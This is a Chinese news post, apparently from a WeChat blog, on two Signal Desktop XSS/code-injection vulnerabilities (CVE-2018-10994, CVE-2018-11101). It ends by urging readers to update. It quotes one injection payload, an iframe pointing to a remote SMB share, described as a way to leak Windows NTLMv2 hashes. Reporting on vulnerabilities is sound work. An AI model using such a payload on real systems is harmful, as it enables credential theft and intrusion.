扎心!私密聊天软件Signal接连翻车

今天用喵语翻译器撩猫

那个嘘寒问暖呦

换来了喵皇一脸看ZZ的表情

(╯°□°)╯︵ ┻━┻

然而,在不到一周的时间里,Signal的用户不得不再次更新桌面应用程序,以修补另一个严重的代码注入漏洞。

周一的时候,安全研究人员发现,新发现的漏洞与前一个漏洞具有相同的威胁,远程攻击者只需发送一条消息,就可以在接收者的Signal桌面应用程序上注入恶意代码, 而不需要任何用户交互

01 前一个漏洞 (CVE-2018-10994)

在这里,小编先给大家捋捋前一个代码注入漏洞 (CVE-2018-10994),介绍研究人员如何发现Signal漏洞及其工作原理

研究人员IVán、Alfredo和Juliano在Signal上聊天时,意外发现了这个漏洞,其中一人分享了一个在其URL中包含有效负载的 站链接。

然而,XSS有效负载意外地在Signal桌面应用程序上执行。(XSS,也称为跨站点脚本,是一种常见的矢量攻击,它允许攻击者向易受攻击的Web应用程序注入恶意代码。)

研究人员经过对多个XSS有效载荷的测试后,发现该漏洞位于负责处理共享链接的功能中,允许攻击者通过iFrame,图像,视频和音频标记注入用户定义的HTML/Java代码。

02

新的漏洞(CVE-2018-11101)

而两者之间唯一的区别是,前面的漏洞存在于处理聊天时分享链接的函数中,而新的漏洞(CVE-2018-11101)存在于处理引用消息验证的不同函数中,即在回复中引用前一条消息。

换句话说,要利用Signal App原版本上的修复错误,攻击者只需将恶意HTML/Java代码作为消息发送给受害者,然后用任意文本引用或者回复同一消息。

如果受害者在其易受攻击的Signal应用程序上,收到这条包含恶意有效载荷的引用消息,它将自动执行有效载荷,而不需要任何用户交互。

03 代码注入窃取会话

到目前为止,用于演示Signal代码注入漏洞的POC有效载荷仅限于将HTML iFrame或图像,视频,音频标签嵌入到受害者的桌面应用程序中。

研究人员现在已经设法制定了一项新的PoC漏洞利用措施,远程攻击者仅通过向他们发送一条消息成功,就能窃取明文中所有受害者的Signal对话。

这一攻击实际上挫败了Signal端到端加密消息的目的,使得远程攻击者能够轻松地掌握用户的纯文本会话,而不会破坏加密。

04 窃取Windows密码

研究人员还指出,攻击者甚至可能利用HTML iFrame共享的远程SMB文件,该文件可被滥用,从而窃取Windows用户的NTLMv2哈希密码。

“在Windows操作系统中,CSP无法阻止SMB远程资源。在这种情况下,可以通过引用SMB共享中的脚本作为iFrame标记的源来实现Java的远程执行,例如:

<iframe src=\DESKTOP-XXXXXTemptest.html>,然后回复它。“

专家推测,如果攻击者利用代码注入来强制Windows操作系统使用单点登录且受攻击者控制的SMB服务器的自动身份验证,它会将受害者的用户名和NTLMv2哈希密码交给攻击者,从而允许他们访问受害者的系统。

如果您也在用Signal,小编建议您立即更新您的Signal,因为现在该漏洞构成了严重风险,您的秘密会话将以明文形式暴露给攻击者,并进一步造成严重后果。

更多精彩,请关注weixin:行长叠

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2018年4月19日
下一篇 2018年4月19日

相关推荐